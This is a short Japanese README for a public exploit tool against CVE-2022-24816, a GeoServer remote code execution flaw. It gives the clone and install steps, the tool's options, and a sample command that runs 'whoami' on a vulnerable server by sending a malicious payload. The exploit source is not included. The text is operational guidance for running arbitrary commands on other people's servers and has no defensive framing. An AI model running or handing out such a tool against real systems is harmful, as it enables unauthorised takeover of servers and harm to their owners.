
リポジトリをクローンする:
git clone https://github.com/c1ph3rbyt3/CVE-2022-24816.git
cd CVE-2022-24816
依存関係をインストールする: Python 3 がインストールされていることを確認してください。次に、以下のコマンドを実行して必要な依存関係をインストールします:
pip install -r requirements.txt
requirements.txt ファイルには以下のライブラリが含まれています:
requestsurllib3colorama-u または --url: 脆弱な GeoServer サーバーのターゲット URL を指定します。例: http://example.com または https://example.com。-c または --command: ターゲットシステム上で実行するコマンドを指定します。特定のコマンドでスクリプトを実行する:
python CVE-2022-24816.py -u https://vulnerable-geoserver.com -c "whoami"
これにより、悪意のあるペイロードがターゲットサーバーに送信され、コマンドの出力が画面に表示されます。
作成者: C1ph3rByt3